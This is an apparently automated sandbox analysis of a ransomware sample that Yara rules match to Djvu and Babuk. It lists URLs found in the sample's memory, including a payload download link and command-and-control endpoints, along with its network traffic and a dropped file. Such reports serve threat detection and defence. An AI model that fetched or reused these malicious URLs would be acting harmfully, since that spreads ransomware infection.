Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935388771.0000000004120000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe$run
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/files/1/build3.exerun8
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330817577.0000000001328000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.000000000097E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.phpP
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013CD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://zexeq.com/raud/get.phpep
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/:
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/=
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/P
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000000.00000002.1692451058.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/d
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	String found in binary or memory: https://api.2ip.ua/geo.json
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001166000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json%
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json)
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json/
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json:
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonM
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonO
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonOC
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonU
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsong
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsongC
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonsS
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/o
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.b?
Source: 30264859306.ttf.2.dr, 37262344671.ttf.2.dr	String found in binary or memory: https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-tnzomMj6
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-tnzomMj6HU
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==
Source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735

Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.24:443 -> 192.168.2.4:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_004F22E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC,

0_2_004F22E0

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

File created: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Yara detected Babuk Ransomware

Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 6376, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe PID: 7148, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, type: SAMPLE
Source: Yara match	File source: 3.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe.e20000.0.unpack, type: UNPACKEDPE
